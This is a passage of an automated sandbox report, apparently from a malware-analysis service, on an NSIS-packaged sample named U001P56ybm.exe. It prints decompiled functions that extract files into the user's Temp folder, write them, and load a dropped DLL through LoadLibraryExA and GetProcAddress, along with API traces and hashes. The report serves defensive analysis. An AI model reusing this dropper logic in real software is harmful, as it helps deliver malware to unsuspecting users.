					} else {
						E0040592B(0x40a378, 0x42f000);
						E0040592B(0x42f000, 0x409b78);
						E0040594D(_t75, 0x40a378, 0x409b78, "C:\Users\hardz\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E0040592B(0x42f000, 0x40a378);
						_t62 = E004051EC("C:\Users\hardz\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42ebe8 =  &( *0x42ebe8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b78);
								_push(0xfffffffa);
								E00404CC9();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404CC9(0xffffffea,  *(_t85 - 8));
				 *0x42ec14 =  *0x42ec14 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0x34));
				_push( *((intOrPtr*)(_t85 - 0x1c)));
				_t43 = E00402E44(); // executed
				 *0x42ec14 =  *0x42ec14 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffee);
					} else {
						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffe9);
						lstrcatA(0x409b78,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b78);
					E004051EC();
					goto L29;
				}
				goto L33;
			}
















                    0x00401734
                    0x0040173b
                    0x00401744
                    0x00401747
                    0x0040174a
                    0x0040174f
                    0x00401757
                    0x00401773
                    0x00401759
                    0x00401759
                    0x0040175a
                    0x0040175a
                    0x00401779
                    0x00401783
                    0x00401783
                    0x00401787
                    0x0040178a
                    0x0040178f
                    0x00401791
                    0x00401793
                    0x00401798
                    0x00401798
                    0x004017a3
                    0x004017a3
                    0x004017b4
                    0x004017b6
                    0x004017b6
                    0x004017b7
                    0x004017b7
                    0x004017ba
                    0x004017bd
                    0x004017c0
                    0x004017c0
                    0x004017c7
                    0x004017d6
                    0x004017db
                    0x004017de
                    0x004017e1
                    0x00000000
                    0x00000000
                    0x004017e3
                    0x004017e6
                    0x00401840
                    0x00401845
                    0x004015a8
                    0x0040264e
                    0x0040264e
                    0x0040287d
                    0x00402880
                    0x00402880
                    0x00000000
                    0x004017e8
                    0x004017ee
                    0x004017f9
                    0x00401806
                    0x00401811
                    0x00401827
                    0x00401827
                    0x0040182a
                    0x00000000
                    0x00401830
                    0x00401830
                    0x00401831
                    0x0040184e
                    0x00402886
                    0x00402886
                    0x00402886
                    0x00401833
                    0x00401833
                    0x00401834
                    0x00401492
                    0x00402200
                    0x00402200
                    0x00402200
                    0x00401831
                    0x0040182a
                    0x00402888
                    0x0040288c
                    0x0040288c
                    0x0040185e
                    0x00401863
                    0x00401869
                    0x0040186a
                    0x0040186b
                    0x0040186e
                    0x00401871
                    0x00401876
                    0x0040187c
                    0x00401880
                    0x00401882
                    0x0040188a
                    0x00401896
                    0x00401884
                    0x00401884
                    0x00401888
                    0x00000000
                    0x00000000
                    0x00401888
                    0x0040189f
                    0x004018a5
                    0x004018a7
                    0x00000000
                    0x004018ad
                    0x004018ad
                    0x004018b0
                    0x004018c8
                    0x004018b2
                    0x004018b5
                    0x004018be
                    0x004018be
                    0x004018cd
                    0x004018d2
                    0x004021fb
                    0x00000000
                    0x004021fb
                    0x00000000

                    APIs
                    • lstrcatA.KERNEL32(00000000,00000000,qdrjldxxem,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                    • CompareFileTime.KERNEL32(-00000014,?,qdrjldxxem,qdrjldxxem,00000000,00000000,qdrjldxxem,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                      • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,foxdilaoqebdbpxrsdbw Setup,NSIS Error), ref: 00405938
                      • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041F887,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                      • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041F887,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                      • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041F887,74E5EA30), ref: 00404D25
                      • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                      • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                      • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                      • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                    • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp$C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll$qdrjldxxem
                    • API String ID: 1941528284-2859206688
                    • Opcode ID: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                    • Instruction ID: 57f74d31a3863b2a576bf3fc3f2571be4e71849821accf25204d9298bb77468e
                    • Opcode Fuzzy Hash: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                    • Instruction Fuzzy Hash: 6C41B471900515FACF10BBB5DD46EAF36A9EF01368B20433BF511B21E1D63C8E418AAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402E44, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 174fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 95%
                    			E00402E44(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				intOrPtr _t95;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418b80;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					_t95 =  *0x42ebb8; // 0x93a3
					E00403098(_t95 + _t65);
				}
				_t67 = E00403066( &_a16, 4); // executed
				if(_t67 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E00403066(0x414b80, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414b80, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E00403066(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b4e4 =  *0x40b4e4 & 0x00000000;
					 *0x40b4e0 =  *0x40b4e0 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40afc8 = 8;
					 *0x414b70 = 0x40cb68;
					 *0x414b6c = 0x40cb68;
					 *0x414b68 = 0x414b68;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E00403066(0x414b80, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40afb8 = 0x414b80;
						 *0x40afbc = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40afc0 = _t100;
							 *0x40afc4 = _v12;
							_t79 = E00405D23("ktA");
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40afc0; // 0x41f887
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ec14 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404CC9(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_t82 =  *0x40afc0; // 0x41f887
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t82;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}



























                    0x00402e4c
                    0x00402e50
                    0x00402e53
                    0x00402e58
                    0x00402e5a
                    0x00402e5a
                    0x00402e61
                    0x00402e65
                    0x00402e6a
                    0x00402e6c
                    0x00402e6c
                    0x00402e73
                    0x00402e78
                    0x00402e7a
                    0x00402e83
                    0x00402e83
                    0x00402e8e
                    0x00402e95
                    0x00403011
                    0x00403011
                    0x00000000
                    0x00402e9b
                    0x00402e9f
                    0x00402ffc
                    0x00403051
                    0x00403016
                    0x0040301c
                    0x0040301e
                    0x0040301e
                    0x0040302f
                    0x00000000
                    0x00403031
                    0x00403044
                    0x00402ff6
                    0x00402ff6
                    0x00403013
                    0x00403013
                    0x00000000
                    0x0040304b
                    0x0040304b
                    0x0040304e
                    0x00000000
                    0x0040304e
                    0x00403044
                    0x0040302f
                    0x0040305c
                    0x00000000
                    0x0040305c
                    0x00403001
                    0x00403003
                    0x00403003
                    0x0040300f
                    0x00403059
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040300f
                    0x00402eab
                    0x00402ead
                    0x00402eb4
                    0x00402ebb
                    0x00402ebb
                    0x00402ec2
                    0x00402eca
                    0x00402ed4
                    0x00402ed9
                    0x00402ee1
                    0x00402eeb
                    0x00402eee
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402ef4
                    0x00402ef4
                    0x00402ef4
                    0x00402efc
                    0x00402efe
                    0x00402efe
                    0x00402f0f
                    0x00000000
                    0x00000000
                    0x00402f15
                    0x00402f18
                    0x00402f1e
                    0x00402f24
                    0x00402f24
                    0x00402f2f
                    0x00402f35
                    0x00402f3a
                    0x00402f41
                    0x00402f44
                    0x00000000
                    0x00000000
                    0x00402f4a
                    0x00402f50
                    0x00402f52
                    0x00402f5b
                    0x00402f5d
                    0x00402f8b
                    0x00402f91
                    0x00402f9a
                    0x00402f9f
                    0x00402f9f
                    0x00402fa6
                    0x00402fea
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402fa8
                    0x00402fab
                    0x00402fcd
                    0x00402fd2
                    0x00402fd5
                    0x00402fd8
                    0x00402fdb
                    0x00402fdf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402fe5
                    0x00402fb9
                    0x00402fc1
                    0x00000000
                    0x00402fc8
                    0x00402fc8
                    0x00000000
                    0x00402fc8
                    0x00402fc1
                    0x00402fa6
                    0x00402ff2
                    0x00000000
                    0x00402ff2
                    0x00000000
                    0x00402ef4

                    APIs
                    • GetTickCount.KERNEL32 ref: 00402EAB
                    • GetTickCount.KERNEL32 ref: 00402F52
                    • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F7B
                    • wsprintfA.USER32 ref: 00402F8B
                    • WriteFile.KERNELBASE(00000000,00000000,0041F887,7FFFFFFF,00000000), ref: 00402FB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: CountTick$FileWritewsprintf
                    • String ID: ... %d%%$ktA
                    • API String ID: 4209647438-1009728241
                    • Opcode ID: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                    • Instruction ID: 9e0124e4ae7d277b0b54c9942477664c6d45ab1b3c5c68ad5b6cbbf63d84754e
                    • Opcode Fuzzy Hash: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
                    • Instruction Fuzzy Hash: A5619E7180120ADBDF10DF65DA48A9F7BB8BB44365F10413BE910B72C4C778DA51DBAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 57%
                    			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x42ec18");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x42ebe8 =  *0x42ebe8 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404CC9(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x42f000, 0x40af78, "��B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                    0x00401f51
                    0x00401f51
                    0x00401f56
                    0x00401f5d
                    0x0040200b
                    0x00402156
                    0x00402156
                    0x0040287d
                    0x00402880
                    0x0040288c
                    0x0040288c
                    0x00401f6c
                    0x00401f76
                    0x00401f79
                    0x00401f88
                    0x00401f8c
                    0x00401f92
                    0x00401f96
                    0x00402004
                    0x00000000
                    0x00402004
                    0x00401f98
                    0x00401fa2
                    0x00401fa6
                    0x00401fea
                    0x00401fa8
                    0x00401fab
                    0x00401fae
                    0x00401fde
                    0x00401fb0
                    0x00401fb3
                    0x00401fbc
                    0x00401fbe
                    0x00401fbe
                    0x00401fbc
                    0x00401fae
                    0x00401ff2
                    0x00401ff9
                    0x00401ff9
                    0x00000000
                    0x00401ff2
                    0x00401f7c
                    0x00401f82
                    0x00401f86
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                      • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041F887,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                      • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041F887,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                      • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041F887,74E5EA30), ref: 00404D25
                      • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                      • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                      • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                      • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                    • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                    • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                    • String ID: B
                    • API String ID: 2987980305-3806887055
                    • Opcode ID: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                    • Instruction ID: a273586f2596c922aa8c6de030caecb0164783ff06d74c4b05909b62d3698487
                    • Opcode Fuzzy Hash: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                    • Instruction Fuzzy Hash: AA11EB72908215E7CF107FA5CD89EAE75B06B40359F20423BF611B62E0C77D4941D65E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E004054B2(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405449(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                    0x004015b3
                    0x004015ba
                    0x004015bd
                    0x004015c2
                    0x004015c6
                    0x004015c8
                    0x004015d0
                    0x004015d6
                    0x004015d8
                    0x004015db
                    0x004015e3
                    0x004015f0
                    0x004015fd
                    0x004015fd
                    0x004015f2
                    0x004015f3
                    0x004015fb
                    0x00000000
                    0x00000000
                    0x004015fb
                    0x004015f0
                    0x00401600
                    0x00401603
                    0x00401605
                    0x00401606
                    0x004015c8
                    0x0040160d
                    0x0040162d
                    0x00402156
                    0x0040160f
                    0x00401611
                    0x0040161c
                    0x00401622
                    0x00401622
                    0x00402880
                    0x0040288c

                    APIs
                      • Part of subcall function 004054B2: CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 004054C0
                      • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054C5
                      • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054D4
                    • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                    • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                    • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                    Strings
                    • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                    • String ID: C:\Users\user\AppData\Local\Temp
                    • API String ID: 3751793516-501415292
                    • Opcode ID: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                    • Instruction ID: 0fc8515a6fa1eb0c4cba02d173a6c2760af3d5d18bb88fe9e963a679bbf3bb3f
                    • Opcode Fuzzy Hash: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                    • Instruction Fuzzy Hash: 98012631908140ABDB117FB62C44EBF2BB0EE56365728063FF491B22E2C23C4842D62E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405631, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00405631(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                    0x00405635
                    0x0040563b
                    0x0040563c
                    0x0040563c
                    0x0040563d
                    0x00405644
                    0x0040564e
                    0x0040565b
                    0x0040565e
                    0x00405666
                    0x00000000
                    0x00000000
                    0x0040566a
                    0x00000000
                    0x00000000
                    0x0040566c
                    0x00000000
                    0x0040566c
                    0x00000000

                    APIs
                    • GetTickCount.KERNEL32 ref: 00405644
                    • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 0040565E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: CountFileNameTempTick
                    • String ID: "C:\Users\user\Desktop\U001P56ybm.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                    • API String ID: 1716503409-999216652
                    • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                    • Instruction ID: 4df4b8b99f59c83ab7109897de74f33533764e09c55b4925cc875bb6e1137cb6
                    • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                    • Instruction Fuzzy Hash: 20F020323082087BEB104E19EC04F9B7FA9DF91760F14C02BFA48AA1C0C2B1994887A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004030AF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                    Download Yara Rule
                    C-Code - Quality: 84%
                    			E004030AF(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405B89(_t6);
				_t2 = E0040548B(_t6);
				if(_t2 != 0) {
					E0040541E(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E00405631("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                    0x004030b0
                    0x004030b6
                    0x004030bc
                    0x004030c3
                    0x004030c8
                    0x004030d0
                    0x004030dc
                    0x004030e2
                    0x004030c6
                    0x004030c6
                    0x004030c6

                    APIs
                      • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                      • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                      • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                      • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                    • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 004030D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
